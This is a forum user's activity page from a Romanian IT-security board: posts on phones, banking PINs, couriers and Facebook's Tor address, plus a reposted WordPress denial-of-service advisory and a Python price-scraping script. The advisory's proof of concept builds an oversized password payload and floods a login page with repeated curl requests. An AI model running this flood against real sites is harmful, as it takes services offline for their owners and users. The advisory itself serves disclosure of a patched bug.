Jump to content

LLegoLLaS

Active Members
 View Profile  See their activity

  • Posts

    2060

  • Joined

  • Last visited

  • Days Won

    11

 Content Type 

Everything posted by LLegoLLaS

  1. LLegoLLaS
    Ar trebui si titlul modificat,e tool specific pentru un anumit model.Ceilalti producatori,prin modificarile de firmware,repara uneori bugurile astea si se pot roota doar cu vulnerabilitati ale firmware-ului respectiv sfat: nu incercati toolu' ala pe alte teelfoane decat huawei
  2. LLegoLLaS
    Ala-i!Mi-am permis si l-am modificat pentru sleed.Mersi
  3. LLegoLLaS

    Hello world

    LLegoLLaS replied to TAZx's topic in Bine ai venit

    TAXz bun...si...legatura intre biologie si securitatea online?
  4. LLegoLLaS
    QR code-ul expira in gen un minut si tre sa generezi altul Also: !!! Whatsapp web functioneaza doar cu telefonul conectat la net,cand ti-ai deconectat telefonul de la net nu mai poti tirmite/primi mesaje pe web. Astfel ca devie putin mai safe...dar mai putin usefull
  5. LLegoLLaS
    asta ca sa nu zici ca am ceva cu tine
  6. LLegoLLaS
    Treaba cu parola din 5 cifre la un cont bancar e cretina (la torrente am parola mai complicata ) dar...Ce-are de nu e bun digipassu? Chiar daca digipassu are o parola de 4 cifre (un pin pe care ti-l setezi tu) el se blocheaza daca bagi parola de (3?) ori gresit.Mie mi se pare ok.
  7. LLegoLLaS
    Returneaz?-l prin curier la magazinul de unde l-ai luat.dai PM pentru detalii
  8. LLegoLLaS
    gen Cell-broadcast banuiesc.Asa cum te anunta in unele zone (mi s-a intamplat in Serbia) in ce localitate esti.Doar ca intr-un perimetru mult mai mic
  9. LLegoLLaS
    E de fapt acel Flexi bonus,right?In functie de cat incarcati puteti sa va luati si bonus cu MB trafic
  10. LLegoLLaS
    adus,a se citi furat. Nu incurajam asta aici pe forum
  11. LLegoLLaS
    +1 .Thanks nu mai merge nici linkul mega
  12. LLegoLLaS
    Exista la noi curier care transporta animale?
  13. LLegoLLaS
    ==================================================================== DESCRIPTION: ==================================================================== A vulnerability present in Wordpress < 4.0.1 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service). ==================================================================== Time Line: ==================================================================== November 20, 2014 - A Wordpress security update and the security advisory is published. ==================================================================== Proof of Concept: ==================================================================== Generate a pyaload and try with a valid user: echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload Perform a Dos with a valid user: for i in `seq 1 150`; do (curl --data @valid_user_payload [url]http://yoursite/wordpress/?q=user[/url] --silent > /dev/null &); sleep 0.5; done ==================================================================== Authors: ==================================================================== -- Javer Nieto -- [url=http://www.behindthefirewalls.com]Hacking while you're asleep[/url] -- Andres Rojas -- [url=http://www.devconsole.info]# /dev/console | "In the beginning … Was the command line" (Neal Stephenson)[/url] ==================================================================== References: ==================================================================== * [url]https://wordpress.org/news/2014/11/wordpress-4-0-1/[/url] * [url]https://www.drupal.org/SA-CORE-2014-006[/url] * [url=http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html]Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url] * [url=http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html]Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url] * [url=http://www.devconsole.info/?p=1050]Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console[/url] sursa;bugsearch.net
  14. LLegoLLaS
    #!/usr/bin/env python import smtplib import urllib2 import random import re import time #panou de configurare email = " " #unde vrei sa primesti ofertele smtp = "smtp.gmail.com" loginuser = "@gmail.com" loginpass = "" chilipir = 25 #pretul(ron) sub care sunteti anuntat interval_timp_cautare = 600 # in secunde print r""" #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#\ #.........RSTforums.com........#-\ #.............Usr6.............#--\/ #...Cautatoru de chilipiruri 1.2...#--/\ #..............................#-/ #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#/ """ def email_sender(TEXT): #print TEXT message = 'To:' + email + '\n' + 'From: ' + loginuser + '\n' + 'Subject:Chilipir \n\n' + TEXT server = smtplib.SMTP(smtp, 587) server.ehlo() server.starttls() server.login(loginuser, loginpass ) server.sendmail(loginuser, email, message) server.quit() print "Oferta a fost expediata" return expediate = [] while True : expediat = "" random_nr = str(random.randint(10**16,99999999999999999)) ua = "Opera/%s.%s (Windows NT %s.%s) Presto/%s.%s.%s Version/%s.%s" \ %(random_nr[0], random_nr[1:3], random_nr[4], random_nr[5], random_nr[6], random_nr[7:9], random_nr[10:13], random_nr[13:15], random_nr[15:17]) try: site = "http://www.emag.ro/resigilate/sort-priceasc" req = urllib2.Request(site, None, {'User-Agent' : ua}) continut = urllib2.urlopen(req, timeout=30).read() match = re.findall('\"money-int\"\>(\d*)\<\/span\>\<sup class=\"money-decimal\"\>\d*.+\n.+\t+.+\n\t.+\n.+\n.+\<a href=\"(.+#resigilate)"',continut) for every in match: pret, link = every if int(pret) <= chilipir: link = "http://www.emag.ro" + link unic = str(pret) + link if unic not in expediate: expediat += str(pret) + "\t" + link +"\n" expediate.append(unic) except Exception as E: email_sender(E) if len(expediat) >= 1: email_sender(expediat) time.sleep(interval_timp_cautare) print time.strftime("%c"), "nimic nou" exit() adaptare sa mearga cu cont de gmail LE: daca e cont nou posibil sa nu mearga prima data (blocheaza loginul,nefiind secure) si sa primiti un mail cu Enable less Secure Access.Dupa ce bifati mere
  15. LLegoLLaS
    ma tenteaza jocu' 37 thanks pentru idee
  16. LLegoLLaS
    E baiat bun Nae.munceste ieftin
  17. LLegoLLaS
    update firmware la htc, schimba simul la vodafone (gratuit sau 10-20 de lei)
  18. LLegoLLaS
    probabil capul de citire ti-a futut platanul/platanele.Garantie si juri pe rosu ca nu l-ai scapat pe jos
  19. LLegoLLaS
    postati stirea asta aici www. c r e s t i n o r t od o x .ro/ forum/ ))
  20. LLegoLLaS
    poate maine displayul,carcasa ca ramu' e lipit de placa on: da,practic e alt telefon edit: nu mai umbla cu telefoane furate
  21. LLegoLLaS
    pentru ca probabil nu l-a portat nimeni pe 4x HD.Din ce sitiu e bazat pe nvidia tegra deci e mai greu. @vHacker vezi xda developpers.acolo o sa gasesti multe romuri si moduri pentru telefonul tau
  22. LLegoLLaS
    The so-called darknet, which is accessible via the anonymizing Tor network, has a reputation for being home to many disreputable sites. But now the biggest social network in the world is available via Tor. Facebook announced Friday that it is available to Tor users via a .onion address--the pseudo-top-level-domain used by Tor hidden services. Anyone wishing to connect to Facebook via Tor can do so by typing https://facebookcorewwwi.onion/ into their web browser when connected to Tor (it won't work otherwise). Facebook says Tor users who visit the social network's .onion site are protected with end-to-end encryption since the .onion site connects directly to a Facebook data center via SSL. Facebook's new .onion site makes it easier for users to connect to the social network via Tor without running into problems. Facebook's security systems, for example, may flag a Tor-connecting account for being hacked. Like a hacked account, Tor user traffic can appear to be coming from several different countries in a short period of time. Why this matters: Facebook's very nature as a social network where anonymity is shunned may seem a strange candidate for creating a Tor site. But there are many reasons to connect to Facebook as securely as possible without revealing your location despite the loss of anonymity on Facebook itself. Participants in the 2011 protests against the Mubarak regime in Egypt, for example, used Facebook to mobilize protesters and inform the public. A first for SSL Facebook's SSL connection via Tor is also a first for the world of .onion sites. The social network's Tor hidden service is the first .onion address to receive a legitimate SSL certificate from an issuing certificate authority, according to a tweet from Runa Sandvik, who contributes to the Tor Project. An SSL certificate is used by your browser to verify that you are connecting to the site you think you are. Facebook says it wanted to use an SSL certificate that cites its .onion address to give users confidence that they were indeed connecting to Facebook and not a malicious imitation. sursa: pcworld ce cacat mai vor?
  23. LLegoLLaS
    Si eu am returnat prin curier un procesor fara coolerul cu care a venit.n-au comentat (dar era in cutia lui)
  24. LLegoLLaS
    banana
  25. LLegoLLaS
    Am votat da pentru motivele date de voi ma sus. Dar daca stau sa ma gandesc mai bine,RST e forum de securitate it.Una din ideile fundamentale ale securitatii online e anonimitatea.Dup-aia v-aud cu topicuri "A gasit mama un cacat in cutia postala insotit de un bilet de amenintare.Ce pot face?"
×
×
  • Create New...